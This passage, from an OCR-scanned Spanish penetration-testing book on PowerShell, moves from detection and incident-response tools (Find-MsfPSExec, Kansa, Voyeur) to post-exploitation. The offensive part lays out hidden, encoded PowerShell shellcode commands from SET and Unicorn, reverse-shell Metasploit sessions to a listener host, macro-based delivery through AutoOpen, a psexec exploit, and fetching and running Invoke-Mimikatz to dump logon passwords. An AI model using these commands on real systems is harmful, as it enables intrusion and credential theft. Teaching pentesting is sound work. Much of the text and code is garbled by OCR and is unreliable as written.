^yeigl.  started  at  2015-B8-03T1I :15 :S5 
Listening  IP  Address  -  192.168.56.104 

LLMNR  Spoof ing  Enabled  | 

H8NS  Spoofing  Disabled 
Spoof  Repeating  Enabled 
HTTP  Capture  Envied 

I1TTPS  Capture  Disabled 
MB  Capture  Enabled 
tepcat  Spoof  Suppression  Disabled 
force  UP8D  Authentication  Enabled 
Console  Output  Enabled 

C:NUseroNp*blo\De3ktopNlnvetgb“nactor  <B,(M1p.e7>  = 

iSbl^n”Uiiai?BiHi»l)3«sS9»6BF78lBi'H«!S|E||flc|K0^1J^3^lMea|DBC39716CBCDM011BCra0C^||CJ||^|^M| 

‘D0003002C007000720061006 3007S00670W300b 10073002 DO0700063002E0063007S 0072 0073006  F002E0063006F00“ 


Fix.  J-i  L  Captura  de  challenge/response  en  hashes  NTLM. 


PESecurity 

r£&, „  scrip,  para  cheque.,  los  binaries  de  los  sislemas  m*hm.  m»  ejeculablcsconio 

arefcos  DLL  Con  PESecr,,,’  so  puede  cs.udiar  si  el  binario  ha  side  compdado  con  * 

.  ,  ,  Aci  i >  ni-p  'snfeSFH  StronsNaming y Authenttcode.  PESecwt . 

proteccion  o  segundad  como  son  ASLR.  DL.P.  bqfebtn.  Mongptam 

se  puede  descargar  desde  la  siguiente  dircccion  URL  https://githuh.eom/NetSPI/l  CSecut  tty . 

ASLR  Address  Space  Layout  Randomization ,  evita  que  el  atacante  conozca  la  di recciot id. i  memona 
ddnde  se  encuentfa  una  funcion  que  quiere  invocar.  E.  mecanismo  ASLR 
exacta  en  cada  ejeeucion.  DEP,  Data  Execution  Prevention,  evita  que  una  ap bewon^  j 
una  zona  de  memoria  no  ejecutable.  SafeSEH.  es  un  mecanismo  que  protege  de  SLH 
StrongNaming, permite  identificar el  binario  univocamente,  tambien  conocido como  imtq  . 

AittZicode  i penuite  a  los  dcsarrolladores  inclutr  informacion  adicional  en  los  binanos  a 
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del  uso  de  firmas  digitales.  Ademas,  con  estas  se  consiguc  aumentar  la  seguridad  del  binario  ante 
posibles  modificaciones  de  este. 


Para  realizar  un  chequeo  sobre  un  archivo  se  puede  ejecutar  la  siguiente  instruction  Get-PESeeurity 
-File  <ruta  del  EXE  a  DLL>.  La  informacion  que  se  obtendra  tras  esta  ejeeucion  son  los  valores 
comentados  anteriormente.  Si  se  requiere  evaluar  los  binarios  que  se  encuentran  dentro  de  un 
directorio  se  puede  ejecutar  la  siguiente  instruccion  Get-PESeeurity  -directory  <path>. 


Fig.  3.52:  Ohtencion  dc  mccanismos  de  seguridad  en  los  binarios  de  un  directorio. 


Respuesta  ante  incidentes 

i£n  este  aparlado  se  van  a  mostrar  varies  scripts  o  conjunios  de  scripts  que  pueden  ser  utilizados 
para  recopilar  informacion  de  un  escenario  tras  un  incidente.  En  muchas  ocasiones  se  tienen  que 
utilizar  herramientas  para  realizar  esta  operativa.  las  cuales  pueden  cambiar  el  entomo.  to  cual  en  un 
incident  response  es  algo  no  recomendado.  Estos  scripts  utilizan  PowerShell  para  realizar  los  menos 
cambios  posibles  en  el  entomo  y  recopilar  informacion  fiable  de  los  sistemas  dc  la  organizacion 
atacada. 

Kansa 

Kansa  es  un  modulo  de  Incident  Response  escrito  en  PowerShell.  Puede  ser  descargado  desde  la 
direceidn  URL  https://githiih.com/davehidl/Kcwsa.  El  modulo  se  encuentra  testeado  en  PowerShell 
\'2  y  posteriores.  Aunque  funciona  mejor  a  partir  de  Ia  version  3  de  PowerShell. 

Para  hacer  funcionar  correctamente  Kansa  se  debe  abriruna  consola  con  privilegios  de  Administrador 
y*  posteriormente.  ejecutar  kansa. ps  1  Taiget  <localhost  u  otras  maquinas>  -ModulePalh 

Modules  -  Verbose.  El  ModulePath  indica  de  donde  Kansa  utilizara  los  recursos  para  la  recopilacidn 
de  informacidn. 

F.n  la  caipeta  Modules  de  Kansa  se  puede  encontrar  gran  cantidad  de  scripts  ulili/.ados  para 
recopilacidn  de  informacidn  referentes  a  configuracidn  de  las  maquinas.  procesos,  logs,  disco, 
etcetera. 

FI  script  deberia  recolectar  informacion  dc  la  maquina  local  o  remota  utilizando  Windows  Remote 
Management.  Si  el  script  da  error,  se  deberia  habilitar  esta  caracteristica.  Cuando  el  script  finaliza  el 
usuario  dispone  de  un  directorio  denominado  Output  timestamp  con  toda  la  informacidn  recolcctada. 


186 


Pentesting  con  PowerShell 


Voyeur 

Voyeur  es  un  conjunto  de  scripts  utilizados  para  realizar  recopilacion  de  informacion  del  directorio 
active.  Voyeur  ha  sido  escrito  por  el  investigador  espahol  Juan  Garrido.  tambien  conocido  como 
Silverhack.  El  codigo  puede  ser  descargado  desde  la  direccion  URL  de  Gilhub  https://github.com/ 
silverhack/voyeur. 

Voyeur  proporciona  una  manera  rapida  para  generar  un  reporte  del  directorio  active.  La  herramienta 
esta  desarrollada  completamente  en  PowerShell.  La  herramienta  es  capaz  de  generar  un  reporte  cn 
Excel ,  si  el  usuario  quiere  lograr  un  reporte  vistoso.  Otro  formato  que  puede  ser  utilizado  es  csv.  El 
reporte  generado  por  la  herramienta  cs  un  punto  de  entrada  para  el  trabajo  de  analisis  de  amenazas, 
en  un  directorio  active,  de  un  analista  forense.  un  equipo  de  incident  response  o  investigadores  de 
seguridad. 

Find-MsfPSExec 

La  funcion  Find~Ms/PSE.xec  permite.  a  traves  de  PowerShell  y  los  eventos  del  sistema,  encontrar 
eventos  que  identifiquen  la  ejecucion  de  una  Meteipreter  en  un  sistema  comprometido.  Esto  es  uno 
de  los  hechos  mas  encontrados  por  los  equipos  de  respuesta  ante  incidentes  en  brechas  de  seguridad 
en  empresas. 

La  funcion  utiliza  Get-Eventlog  para  matchear  los  eventos  del  sistema  que  tengan  como  identificador 
el  7045,  los  cuales  informan  de  la  ejecucion  de  un  servicio.  y  comprobar  si  el  nombre  del  servicio 
cotnienza  por  'W  y  si  la  ruta  tiene  la  estructura  '* *%SYSTEMROOT%\  ?????  ???.exe*  *\  La  segunda 
parte  local iza  el  binario  que  ha  ejecutado  esa  Meterpreter  a  traves  de  la  invocacion  del  servicio. 

Esto  no  asegura  que  sea  una  Meterpreter  lo  que  se  ha  ejecutado  en  el  sistema,  pero  las  posibilidades 
han  ido  aurnentando  si  encajan  las  3  comprobaciones.  Por  desgracia,  Metasploit  ha  cambiado  este 
hecho  en  algunas  versiones.  es  decir,  se  conocia  que  cuando  se  invocaba  una  Meterpreter  a  traves  del 
modulo  psexec  de  Metasploit  se  creaba  un  servicio  que  comenzaba  por  “IVT  y  almacenaha  el  binario 
en  %SYSTEMROOT%.  Hoy  dia.  las  versiones  mas  modernas  no  utilizan  la  “NT  para  comenzar  el 
nombre  del  servicio.  sicndo  este  valor  aleatorio. 


Es  cierto  que  la  version  del  modulo  de  psexec  pueda  ser  antigua.  y  se  puedan  detectar  los  Meterpreter 
ejecutados  en  una  maquina  comprometida.  ya  que  este  metodo  es  muy  utilizado  para  llevar  a  cabo 
movimientos  laterales  en  una  organizacion  comprometida.  El  codigo  de  la  funcion  puede  descargarse 
desde  la  direccion  URL  https://github.coni/obscuresec/PowerShefl/bIob/master/Find-MsfPSExec.  A 
continuacion  se  muestra  el  codigo: 

Function  Find-Msf PSExec  { 

SServiceStarted  *  (Get-Eventlcg  -LogName  "system"  I  Where -Object  ($_.EventID  -eq 
/ 0 4 5 )  I  Where-Object  {  ($_. Message  -match  "Service  Name:  M" )  \  I  Where-Qbject  (  (S_. 
Message  -like  ^.SYSTEMROOTS \?7 ??????. exe* ")  ) ) 

SServiceStarted  Foreach-Object  { 

SUserName  =  $_.UserName 
$Tirr;e  =  $_.  TimeGenerated 
SHostname  -  $  .MachineName 
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SObjectProps  -  @ { 'Hostname'  =■  SHostname; 

'UserName'  =  SUserName; 

'Time'  -  $Time;J 

SReSults  =  New-Object  -TypeN&me  PSObject  -Property  SObjectP-™. 
Write-Output  $Results  *vu3ectProps 

| 

FI  script  puede  scr  facilmente  modificado  para  encontrar  o  matchear  las  ejecuciones  en  las  nuevac 
versiones  de  Metasploit,  pero  para  e.lo  hay  que  matchear  que  el  nombre  del  se^icio  com  ene ^ 
numu-o  de  caiacteies  tope.  A  continuacion  se  propone  una  version  reducida  del  script  uue  DUede 
permitir  al  pentester  o  analista  realizar  su  deteccion  (Get-Eventlog  -LogName  "system  "  l  in 
Object  (S_.EventlD.ee,  7045>,  |  Where-Object  {(S  Message -match  ZZ dTseZcil M  V 
a  modificacion  seria  cambiar  el  match  por  like  con  la  iongitud  de  interrogantes  equivalente. 

E!  iu!"3  dei  ”a  'lperaliv°  lmporta-  P°r  10  <lue  si  version  del  sistema  es  otra  no  inglesa 
mJrh  C&mh'&L  ’  .C^M  eXpUCSta  anlcriorniente-  ya  que  cuando  se  ejecuta  {($_.  Message 
Sei  v,ce  Name-  M  )}  no  matcheara  ningun  resultado.  va  que.  por  eiemolo  en  esnanr.l 
sena  Nomine  de  servicio:  M”.  A  continuacion  se  muestra  la  modificaeion  del  script  el  oral  ya  es 
tyecutable  direetamente.  para  obtener  los  resultados.  ( Get-Eventlog  -LogName  "system  "  Mere 
Object  {$  .Even tlD  -eq  7045. f  |  Where-Object  ,($_. Message  -match  "Nombre  de,  SeZn o  M"  ] 
If  here-Object  { ft  .Message  -like  "*%SYSTEMROOT%\????????.exe*  ") } )  |  Format-List 

einbinario^TeciaadoedF|V'SUahZa^  ^  ?"  qUC  el  CVent0  se  «ener6’  el  servieio  fite  lanzado  y 
b  nano  ejccu  ado.  El  nombre  del  servie.o  es  MqQTGq TDCqaxNJn UodCbHHA IZXgK i /  por  lo 

sea  una  y  ei  ,,ombre  dei  archiv<) « - 


Fig.  3.53  Detect  ion  de  Meterpreter  con  PowerShell. 
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Capitulo  IV 

PowerShell  y  otras  herramientas: 
Pentesting  sin  limites 


1.  La  post-explotacion  con  PowerShell 

En  este  capitulo  el  lector  podra  estudiar  herramientas  extemas  a  PowerShell  que  se  apoyan  cn  la  linea 
de  comandos  de  Microsoft  para  obtener  un  heneficio,  generalmente,  en  la  fase  de  post-exploitation. 
Hay  gran  cantidad  de  herramientas  y  lenguajes  capaces  de  generar  codigo  o  instmcciones  de 
PowerShell  con  las  que  el  pentester  podra  obtener  un  bencficio,  como  se  menciono  anteriormente. 

(>Por  que  se  obtiene  un  beneficio?  En  los  sistcmas  Microsoft ,  desde  que  la  linea  de  comandos  se 
eneuentra  nativa  desde  Windows  Wista  y  Windows  Sen'er  200ft,  todas  las  acciones  de  recopilacion 
de  informacion.  obtencion  de  privilegio.  ejecucion  de  codigo.  acciones  a  traves  de  dicha  maquina. 
etcetera,  pucden  realizarse  con  PowerShell .  Por  ejemplo,  la  comunidad  de  Metasploit  se  dio  cuenta 
de  cste  hecho  y  han  centralizado  esftierzos  para  sacar  el  maximo  potencial  a  PowerShell  a  traves  de 
las  sesiones  de  Meterpretcr.  Hoy  en  dia.  se  puedc  abrir  una  PowerShell  interactiva  a  travds  de  un 
payload  de  Metasploit  y  aprovechar  todo  el  potencial  que  cn  este  libro  se  ha  reflcjado  en  cl  capitulo 
dedicado  a  los  d isti nios  frameworks  de  PowerShell .  Adcnias.  se  podran  ejecutar  los  diferentes  scripts 
que  el  pentester  pueda  desarrollar  con  la  ayuda  del  presente  libro. 

En  algunos  entornos  puede  ser  util  disponer  de  una  instruccion  de  tipo  EncodedCommand con  la  que 
ejecutar  codigo  en  Base64  y  conseguir  ejecutar  instmcciones.  Esto  ya  se  ha  visto  en  el  libro.  pern 
existen  herramientas  escritas  en  Python .  o  incluso  el  propio  conjunto  de  herramientas  de  ingenieria 
social  denominado  SEE  que  pcmiiten  erear  este  tipo  de  instmcciones.  Estas  instmcciones  son  tan 
potentes  que  un  pentester  podria  llevarlas  almacenadas  en  un  txr  y  pegarlas  directamente  sobre  la 
PowerShell  o  ejecutarlas.  por  ejemplo.  a  traves  del  payload  de  PowerShell  de  Metasploit  obtenido  a 
traves  de  una  explotacion  de  una  vulnerabilidad  cn  la  fase  previa. 

Por  ultimo,  hacer  hincapie  en  que  existen  diferentes  modulos  escritos  en  PowerShell  que  integran 
con  herramientas  como  Metasploit  y  Nessus ,  como  son  Posh- Metasploit  y  Posh-Nessits.  En  este 
capitulo  sc  hara  un  recorrido  por  el  modulo  de  Metasploit  y  se  vera  la  interaction  con  el  famoso 
framework  de  explotacion. 
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2.PowerSheIl:  Ejecucion  de  payloads 

Hn  muchas  ocasiones  existen  politicas  locales  o  de  dominio  que  evitan  quc  los  usuarios  puedan 
ejecutar  una  cmd.  pero  a  dia  de  hoy  muchos  adrainistradores  no  tienen  tanto  en  cuenta  a  la  PowerSheU. 
y  esta  herramienta  es  aun  mas  potente  que  la  and  clasica  de  Windows.  Si  un  usuario  tiene  acceso 
fisico  a  un  equipo  puedc  ejecutar  cualquier  tipo  de  codigo  a  traves  de  una  PowerShell.  por  ejemplo 
un  Meterpreter. 

Es  sabido  que  PowerShell  tiene  una  serie  de  politicas  de  ejecucion  de  scripts,  como  ya  se  ha  visto  en 
el  libro.  A  modo  de  resumen,  un  administrador  puedc  configurar  una  politica  restricted  eon  la  que  un 
usuario  no  podra  ejecutar  scripts  a  traves  de  PowerShell.  Otra  opcion  es  unrestricted,  con  la  que  un 
usuario  puede  ejecutar  cualquier  tipo  de  script  en  la  consola. 

Las  opciones  allsigned  y  nemotesigned  indican  quc  para  poder  ejecutar  cualquier  script  en 
la  maquina  se  necesita  que  este  firmado.  mientras  que  la  segunda  opcion  mdica  que  los  scripts 
creados  localmente  pueden  ser  ejecutados  sin  necesidad  de  que  esten  finnados,  pero  los  que  hayan 
sido  creados  fuera  del  equipo  deben  estar  finnados.  Para  visualizar  en  una  PowerShell  la  politica 
configurada  se  debc  ejecutar  el  comando  Get-ExecutionPolicy. 

1)  Spear-Phishing  Attack  Vectors 

2)  Website  Attack  Vectors 

3)  Infectious  Media  Generator 

4)  Create  a  Payload  and  Listener 

5)  Mass  Mailer  Attack 

6)  Arduino-Based  Attack  Vector 

7)  SMS  Spoofing  Attack  Vector 

8)  Wireless  Access  Point  Attack  Vector 

9)  QRCode  Generator  Attack  Vector 

10)  Powershell  Attack  Vectors 

11)  Third  Party  Modules _ 

Fin.  4.01:  Menu  tie  SET  con  disunion  vectores  de  unique 


La  herramienta  SET.  Social  Engineering  Toolkit,  permile  realizar  diversos  ataques  basados  en 
ingenicria  social.  Uno  de  los  vectores  que  muestra  es  la  utilizacion  de  PowerSheU  para  llevar  a  cabo 
ejecucion  de  codigo  sobre  esta  consola  dc  Windows . 

El  vector  de  ataque  de  PowerShell  proporciona  diversas  posibilidades,  pero  el  resultado  es  similar 
en  todas.  Se  puede  obtenerel  codigo  de  un  script  el  cual  puede  serejecutado  directamenle  copiando 
y  pegando  sobre  la  PowerSheU.  por  si  exisle  alguna  politica  en  la  maquina  que  restrinja  la  ejecucion 
de  scripts,  o  se  puede  obtener  una  instruccion  que  invoca  la  ejecucion  de  codigo  en  base64.  Esto 
ultimo  es  realmente  interesante.  ya  que  de  algun  modo  ofusca  y  hace  que  se  pueda  ejecutar  codigo 
de  manera  menos  transparente. 

En  el  presente  ejemplo  se  va  a  utilizar  la  opcion  PowerSheU  Alphanumeric  Shellcode  Injector  que 
permite  crear  una  instruccion  que  ejecutara  una  PowerSheU  de  forma  no  interactive  y  cl  codigo  a 
ejecutar  se  encontrara  encocleado  en  base64. 
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1)  Powershell  Alphanumeric  Shellcode  Injector 

2)  Powershell  Reverse  Shell 

3)  Powershell  Bind  Shell 

4)  Powershell  Dump  SAM  Database _ _____ 

Fig.  4.02 :  Opciones  que  proporciona  SET  sobre  PowerSheU 


Una  vez  seleccionado  cste  ataque  se  solicitara  al  usuario  una  serie  de  parametros  para  configurar.  los 
cuales  se  explican  a  continuacion: 

-  Direcctdn  IP  a  la  cual.  una  vez  ejecutado  el  codigo  en  la  PowerSheU.  se  devolvera  el 
control  de  la  maquina  victims. 

-  Puerto  en  el  que  el  atacante  estara  escuchando  y  esperando  a  la  ejecucion  del  codigo. 

-  Una  vez  generada  la  instruccion,  se  solicita  aJ  usuario  si  quiere  configurar  el  handler  de 
Metasploit  para  recibir  el  control  de  la  maquina  donde  se  ejecute  el  codigo  generado. 

set : powe  rshe  L  L>I  ”  - - - — - 

iset>  IP  address  for  the  payload  listener;  192.168.56.103 
Sfet: power siigll>  Enter  the  port  for  the  reverse  [443]: 

Prepping  the  payload  for  delivery  and  injecting  alphanumeric  shellcode... 
Generating  x86-based  powershell  injection  code... 

Finished  generating  powershell  injection  bypass. 

Encoded  to  bypass  execution  restriction  policy... 

If  you  want  the  powershell  commands  and  attack,  they  are  exported  to  /root/ 
set/ reports/powershell/ 

set>  Do  you  want  to  start  the  listener  now  [yes/no] ;  ;  yes _ 

Fig.  4.03:  Configuracion  de  Alphanumeric  Shell  axle  Injector. 


Un  atacante  con  acceso  fisico  a  un  equipo  Windows  puede  introducir  en  cl  equipo  un  fichero  txt  con 
la  instruccion  generada,  ya  sea  porque  se  lo  descarga  de  Internet  o  lo  tiene  almacenado  en  un  medio 
extraible.  El  atacante  tendra  configurado  cl  handler  en  un  equipo  remolo  que  sera  el  que  recibira 
cl  control,  produciendose  la  peticion  desde  dentro  hacia  fiiera,  por  lo  que  generalmente  sc  evitaran 
temas  de  firewall. 

En  el  ejemplo  sc  puede  visualizar  diversas  opciones  en  la  ejecucion  dc  PowerSheU.  A  continuacion 
se  enumcran  las  opciones  y  el  significado  de  eslas: 

-  -nop.  Indica  que  PowerSheU  sera  ejecutada  sin  ningtin  profile  cargado. 

-  -windows  hidden.  Indica  que  la  instruccion  sera  ejecutada  en  una  ventana  oculta. 

-  -noni.  Indica  que  la  consola  no  sera  interactive. 

-  -enc.  Indica  que  a  continuacion  viene  el  codigo  de  PowerSheU  a  ejecutar. 

_Archivo  Edicion  Formato  Ver  Ayuda 

powershell  -nop  -windows  hidden  -noni  -enc 

JAAxACAAPQAgACcA]ABjACAAPQAgACcA]wBbAEQAbABsAEkAbQBw|i\G8A 

cgBBACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUA 

VgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AlAB:AG4A 

dABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQA 

Fig.  4.04:  Instruccion  generada  con  SET  para  PowerSheU. 
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Cuando  el  usuario  malicioso  ejecuta  la  instruction  cn  la  PowerShell  se  esta  proporcionando  acceso  y 
control  remoto  de  la  maquina.  Tal  y  como  puede  visualizarsc  en  la  imagen  se  ejecuta  una  Meterpretet 
sobre  una  maquina  Windows  Server  20 1 2  en  este  caso. 

msf  exploit (handler)  > 

Started  reverse  handler  on  0.0.0.0:443 
]  Starting  the  payload  handler . . . 

Sending  stage  (769024  bytes)  to  192.168.56,102 
[  Meterpreter  session  1  opened  (192,168.56.103:443  ->  192.168.56.102:57574)  at 
2015-03-13  08:16:56  +0100 

ms.f  exploit  (handler )  >  sessions  -i  1 
[  Starting  interaction  with  1. . . 

Computer  :  WIN-6UEBSMLDJEB 

OS  :  Windows  2012  (Build  8400). 

Architecture  :  x64  (Current  Process  is  W0W64) 

System  Language  :  es_ES 

Meterpreter  :  x86/win32 


Pig,  4  ,05:  Toma  de  control  cm  remaio  de  fa  maquina  con  accent  Jhico. 


Logicamente.  cuando  hay  una  intrusion  remota  se  puede  ejecutar  este  tipo  de  tecnieas  para  de  forma 
posterior  tomar  el  control  de  la  maquina  remota.  Por  ejemplo.  en  una  vulnerabilidad  dc  Command 
Injection  en  una  aplicacion  web  que  utilice  Windows  con  PowerShell  en  el  sistema  podria  ejecutarse 
este  tipo  dc  instrucciones  para  lograr  una  Meterpreter. 


3.  PowerShell  Shellcode  Injection  con  Python 

Kn  este  apartado  se  trata  una  herramienta  escrita  en  Python ,  la  cual  proporciona  al  pentestei  la 
posibilidad  de  obtener  codigo  en  PowerShell  para  ejecutar  una  shellcode  en  memoria.  Ademas,  un 
derivado  de  esta  herramienta,  denominado  UnicornlC ,  permite  obtener  codigo  en  lenguaje  C  para 
eonseguir  crear  un  hinctrio  Windows,  el  cual  cnlazara  la  ejecucion  de  la  shellcode  y  obtiene  una  gran 
tasa  de  evasion  de  antivirus. 

La  base  de  la  herramienta  Unicorn  es  el  bypass  de  PowerShell  presentado  por  David  Kennedy  y  Josh 
Kelly  en  Defcon  18.  La  shellcode  se  inyecta  directamenie  en  la  memoria  a  traves  de  PowerShell.  y 
esto  hard  que  su  detection  sea  compleja.  Unicorn  puede  obtenerse  en  la  siguiente  direction  URL 

hnps://github.com/lrustedsec/imicom. 

El  uso  dc  unicorn. py  es  realmente  sencillo.  su  ejecucion  cs  la  siguiente  python  unicorn.py  <payload 
<direccion  IP>.  Para  ejemplificar  se  puede  visualizar  la  siguiente  instruction  python  unicorn.py 
windows/meterpreler /reverse Jcp  192.168.56.WL  Como  puede  observarse  se  debera  disponer  de 
Aletasploit  instalado,  ya  que  el  script  de  Python  lo  utiliza  para  genera  la  shellcode. 
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Tras  !a  ejecucion  de  Unicorn  sc  obtienen  2  ficheros.  El  primero  de  losficheros  contiene  la  instruction 
ou  ti Shell  que  se  debe  ejecutar  en  la  linea  de  comandos,  por  ejemplo  copiando  y  pegando 

La  instruction  generada  tiene  el  siguiente  aspecto: 

PowerShell.exe  -Window  Hidden  -EncodedCommand  <shellcode  encoded>.  El  segundo  archive 
contiene  las  instrucciones  dc  Metasploit  necesarias  para  configurar  el  multi/handler  para  recibir 

plwmShefr  EStC  met°d°  fUnC'°nard  e"  cualciuier  sistema  Windows  donde  se  encuentre  instalado 

Los  archi  vos  ofimaticos  de  Office  pueden  utilizar  macros  y  las  instrucciones  de  PowerShell  aeneradas 
por  Unicorn  pueden  ser  utilizadas  en  estas  macros  con  el  fin  de  que  al  abrirse  un  archivo  se  ejecute 
la  macro  con  el  codigo  malicioso.  J 

Para  ello,  se  puede  crear  una  nueva  macro  en  un  archivo  ofimatico  y  en  el  metodo  AutoOpen  neaar 
e  codigo  generado  para  PowerShell.  Cuando  el  usuario  ejecute  el  archivo  ofimatico  le  saldra  un 
mensaje  mdicando  que  el  archivo  esta  danado  y  automaticamente  se  cerrara,  pero  se  debe  obtener  la 

rssifc  siss cjecutado  ensaftando  ai  usuari°- Esta  t6cnica  se  den°mina  ei  atatiue  macrt* 

Enresumen.  se  obttene  2  ficheros,  PowerShell_attack.txt y  unicorn. rc.  El  archivo  de  texto  contiene 
todo  el  codigo  necesario  para  inyectar  el  ataque  en  memoria.  El  segundo  archivo  contiene  la 
configuration  del  handler ,  simplemente  hay  que  ejecutarlo,  por  ejemplo  con  msfconsole-iv  unicorn, 
tc  o,  dentro  de  la  consola.  resource  unicorn. rc. 


4.  Payloads  de  PowerShell  en  Metasploit 

La  posibilidad  de  utilizar  PowerShell  como  Payload  en  Metasploit  abre  un  nuevo  mundo  de  posr- 
exploitation.  Generalmente.  un  pentester  podia  utilizar  una  shell  o  on* tras  una  explotacion.  o  en 

cl  mejor  de  los  casos,  una  Meterpreter  que  proporciona  gran  cantidad  de  funcionalidades  para  la 
post-exp/o/acion.  v 

A  mediados  de  2015  se  desarroilo  la  posibilidad  de  utilizar  un  payload  de  tipo  inline  que  ofrece 
la  posibilidad  de  ejecutar  una  PowerShell  interactiva  de  tipo  bind  y  de  tipo  reverse.  Juntando  este 
payload  con  los  diferentes  frameworks  de  PowerShell  que  se  han  visto  en  este  libro  se  obtiene  un 
gran  potencial  en  la  tase  de  post-exploitation,  incluso  estando  a  la  altura  de  Meterpreter. 

Hay  que  tener  en  euenta  que  tener  una  PowerShell  interactiva  permite  acceder  a  todos  los 
componentes  del  sistema  operat.vo  y  productos  de  Microsoft.  Ademas.  permite  ejecutar,  como  se  ha 
mencionado  antenormente,  todos  los  scripts  que  la  gente  de  la  comunidad  va  desanollando  y  que  se 
encuentran  accesible  en  Github.  J 

Por  supuesto,  tambien  el  pentester  puede  desarrollar  sus  scripts  y  ejecutarlos  a  traves  de  dicha 
/  owe r Shell  interactiva. 
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msf  >  use  exploit  /windows /smb/psexec 

msf  exploit {  )  >  set  RHOST  192.168.56.103 

RHOST  =>  192.168.56.103 

msf  exploit  (  )  >  set  PAYLOAD  windows /powershell__ rev erse_tcp 

PAYLOAD  =>  windows/powershell_reverse_tcp 

msf  exploit L  )  >  set  LHOST  192.168.56.102 

LHOST  =>  i92 . 168 .56. 102 

msf  exploits  )  >  exploit 

[•j  Started  reverJL  SSL  handler  on  192.168.56.102:4444 
H  Connecting  to  the  server... 

[*1  Authenticating  to  192. 158. 56. 103: 445 | WORKGROUP  as  user  ' administ rador ' . . . 

[ *  1  Uploading  payload. . . 

[•J  Created  \NNPqQhkm.exe... 

1+]  192.168.56.103:445  -  Service  started  successfully... 

I  *  1  Deleting  \NNPqQhkm .exe . . . 

[*]  Powershell  session  session  3  opened  (192.168.56.102:4444  ->  192.168.56.103:49164) 
00 

Windows  PoWerShell  running  as  user  PRACTICAS-PC$  on  PRACTICAS-PC 
Copyright  (C)  2015  Microsoft  Corporation.  All  rights  reserved. 

PS  C:VWindows\system32>cd. . ;  cd. . 

PS  C:\>  whoami 
nt  authority\system 
PS  C :\>  Is 


Di recto rib:  C:\ 


Mode  LastWriteTime  Length  Name 


d----  15/03/201.2  18:52  70ed9061ea46972ac9 

d 29/07/2014  19:29 _ EFS  Software _ 


Fig  4.06 :  Obtencion  de  una  PowerSbett  interactiva  con  Metasploit. 


Una  de  las  principales  ventajas  de  utilizar  PowerShel!  como  payload  es  que  sus  herramientas  o 
scripts  estan  escritos  en  PowerShel  I  y,  cn  la  mayoria  de  el  las,  no  se  accede  al  disco  dura,  por  lo  que 
los  sistemas  antivirus  no  pueden  detectar  dichas  herramientas. 

PowerShel!  estaba  presente  en  Metasploit  a  traves  de  algunos  modulos  que  permitian  ejecutar scripts 
o  herramientas  pero  no  de  forma  interactiva  como  cl  payload  que  se  presenta  aqui.  La  ruta  donde 
se  encuentra  el  payload  interactivo  de  PowerShel!  es  pavIoad/windows/PowerShell  reverse Jcp  y 
payload/windo  ws/PowerShel  Ibindtcp . 

Cuando  se  obtiene  una  sesion  interactiva  de  PowerShell  tras  explotar  alguna  vulnerabilidad  con 
Metasploit  se  puede  utilizar  un  atributo  denominado  LOAD  MODULES,  el  cual  permite  indicar 
la  ubicacion  del  fichero  .psl  donde  se  encuentra  la  funcion  que  se  quiere  cargar  automaticamente 
con  el  payload .  Si  se  quiere  disponer  de  la  fiincion  Invoke- Mimikatz  de  PowerSploit  y  cualquicr 
otra  de  cualquier  framework  estudiado  en  el  libro  se  puede  indicar  a  traves  de  este  atributo.  Por 
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ejemplo.  para  anadir  una  funcion  se  indicara  set  LOADMODULES  htips://raw>.githubusercontpni 
com/niattifestation/PowerSploii/niaster/Exfil trot ion/I 'nvoke-Mimikatz.ps  I .  Si  se  quiere  aftadir  ml 
funciones,  se  mdican  separadas  por  comas  q  anad,r  mas 


exploit (  )  >  exploit 

!•!  1  modul9-Linto  th9  interactive  PowerShell  session 

Started  reverse  SSL  handler  on  192. 168. 56. 102  4444 
I  I  Connecting  to  the  server 

!’!  . 152 • 168 ' W •  1°3:445 ,  WORKGROUP  aS  use,  •  abstractor . . . 

f‘l  Created  \ezltvADP.exe... 

\t]  ^-^8.56.103:445  -  Service  started  successfully...  I 

I  I  Deleting  \erltvADP.exe...  y 

00 '  Powershell  session  session  3  opened  (152. 168.56. 102:4444  ->  192.168.56.103:49176)  at  2015-08-12  17:35:5s  .08 

Conv^hw?!^^  running  as  user  PRACTICAS-PC*  on  PRACTICAS-PC 
Copyright  (C)  2015  Microsoft  Corporation.  All  rights  reserved. 

[+]  Loading  modules. 

P^CAWindows\s^stem32> 


Pig.  4.07  Cargo  de  scripts  en  la  sesion  de  PowerShel l  interactiva  en  Metasploit . 


c  puede  valoiar  la  posibilidad  de  utilizar  un  psl  que  cargue  todas  las  ftinciones  por  ejemplo 
del [  framework  PowerSploit  o  Ntshang.  En  algunos  de  los  frameworks  comentados  en  el  libm^e 
encuentra  este  ttpo  te  script,  el  cual  tiene  un  peso  grande  ya  que  contiene  todas  las  fttncionalidades. 

Una  yez  realizada  la  explotacion  y  ejecutado  el  payload,  se  puede  visualizar  en  la  imagen  como  se 
muestra  la  Jinea  Loading  Modules.  El  payload  de  PowerShel!  ha  descargado  automaficamente  la 
lunuon  y  la  ha  importado  a  la  sesion  interactiva  de  PowerShel/.  En  este  instante  se  puede  ejecular  la 
ftincon  nnportada  automaticamente,  tal  y  como  se  puede  visualizar  en  la  imagen.  '  ‘  ‘ 

La  funcion  hvoke-Mimikatz,  en  este  caso  se  ha  ejecutado  a  traves  de  la  PowerShel /  interactiva  v 
proporciona  los  resultados  en  la  consola.  interactiva  y 


fcopjHahr7c!'S5mi  ,^unnin9  f  PRACTICAS-PC*  on  PRACTICAS-PC 
(Copy right  (C)  2015  Microsoft  Corporation.  AU  rights  reserved. 


J 


[+]  Loading  modulos. 

PS  C :\Windows\system32>invoke-mimikatz 

minllkat2:  2-0  al-pha  (x86)  ''-Lease  "Kiwi  en  C"  (Feb  16  2015  22:17:52) 

##  /  \  ##  /*  ‘  4 

•iY#f  httna//mfLPY  ;gL7nkiwr  (  benja, nin@gentilkiwi.com  , 

IZZ.  httP-//blog.  gentilkiwi.com/mimikatz  (oe.eo) 

with  15  modules  *  f  ♦/ 


mimikatz(powersheU)  #  sekurlsa :  :logonpasswords 


Fig.  4.08:  Ejecucinn  de  lafimeion  invoke-Mmikar.  a  Irenes  de  la  PwerSM!  interactivn  tl‘ pane,. 
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Authentication  Id  : 

0  ;  151260  ( 00000000 :O0024edc) 

Session  : 

Interactive  from  1 

User  Name  : 

pablo 

Domain  : 

PRACTIGAS-PC 

SID  : 

